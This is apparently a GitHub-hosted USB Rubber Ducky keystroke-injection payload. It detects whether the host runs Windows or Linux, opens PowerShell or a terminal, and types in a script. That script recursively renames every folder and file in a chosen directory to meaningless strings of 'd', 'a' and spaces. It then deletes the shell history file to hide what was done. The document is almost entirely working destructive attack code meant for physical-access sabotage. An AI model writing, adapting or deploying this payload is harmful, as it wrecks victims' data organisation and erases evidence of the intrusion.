||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN PowerShell
|
||||||
|
DELAY 1000
|
||||||
|
|
||||||
|
STRINGLN_POWERSHELL
|
||||||
|
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
|
||||||
|
|
||||||
|
function Rename-Directories {
|
||||||
|
param (
|
||||||
|
[string]$path,
|
||||||
|
[ref]$counter
|
||||||
|
)
|
||||||
|
|
||||||
|
$folders = Get-ChildItem -Path $path -Directory -Recurse | Sort-Object FullName -Descending
|
||||||
|
foreach ($folder in $folders) {
|
||||||
|
$newFolderName = "d" * $counter.Value # Crea il nuovo nome della cartella
|
||||||
|
$newFolderPath = $newFolderName
|
||||||
|
|
||||||
|
$counter.Value++
|
||||||
|
|
||||||
|
Rename-Item -Path $folder.FullName -NewName $newFolderPath
|
||||||
|
Write-Host "Rinominata cartella: $($folder.FullName) -> $($newFolderPath)"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function Rename-Files {
|
||||||
|
param (
|
||||||
|
[string]$path,
|
||||||
|
[ref]$counter
|
||||||
|
)
|
||||||
|
$files = Get-ChildItem -Path $path -File -Recurse
|
||||||
|
foreach ($file in $files) {
|
||||||
|
$newFileName = "a" + " " * $counter.Value # Crea il nuovo nome del file
|
||||||
|
$newFilePath = "$newFileName" + $file.Extension
|
||||||
|
|
||||||
|
$counter.Value++
|
||||||
|
|
||||||
|
Rename-Item -Path $file.FullName -NewName $newFilePath
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
$counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
||||||
|
END_STRINGLN
|
||||||
|
|
||||||
|
ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN
|
||||||
|
REM %%%%% GNU/LINUX CODE %%%%%
|
||||||
|
|
||||||
|
REM_BLOCK
|
||||||
|
Credits: Hak5 LLC
|
||||||
|
Website: https://hak5.org/
|
||||||
|
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 1000
|
||||||
|
|
||||||
|
STRINGLN_BASH
|
||||||
|
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
|
||||||
|
|
||||||
|
rename_directories() {
|
||||||
|
local path=$1
|
||||||
|
local counter=$2
|
||||||
|
|
||||||
|
directories=$(find "$path" -type d | sort -r)
|
||||||
|
|
||||||
|
for dir in $directories; do
|
||||||
|
new_folder_name=$(printf 'd%.0s' $(seq 1 "$counter")) # Crea il nuovo nome della cartella
|
||||||
|
new_folder_path="$path/$new_folder_name"
|
||||||
|
|
||||||
|
counter=$((counter + 1))
|
||||||
|
|
||||||
|
mv "$dir" "$new_folder_path"
|
||||||
|
done
|
||||||
|
}
|
||||||
|
|
||||||
|
rename_files() {
|
||||||
|
local path=$1
|
||||||
|
local counter=$2
|
||||||
|
|
||||||
|
files=$(find "$path" -type f)
|
||||||
|
|
||||||
|
for file in $files; do
|
||||||
|
extension="${file##*.}"
|
||||||
|
|
||||||
|
new_file_name="a$(printf ' %.0s' $(seq 1 "$counter"))"
|
||||||
|
|
||||||
|
new_file_path="$(dirname "$file")/$new_file_name"
|
||||||
|
|
||||||
|
if [[ "$extension" != "$file" ]]; then
|
||||||
|
new_file_path="$new_file_path.$extension"
|
||||||
|
fi
|
||||||
|
|
||||||
|
counter=$((counter + 1))
|
||||||
|
|
||||||
|
mv "$file" "$new_file_path"
|
||||||
|
done
|
||||||
|
}
|
||||||
|
|
||||||
|
counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit
|
||||||
|
END_STRINGLN
|
||||||
|
END_IF
|
Loading…
Reference in New Issue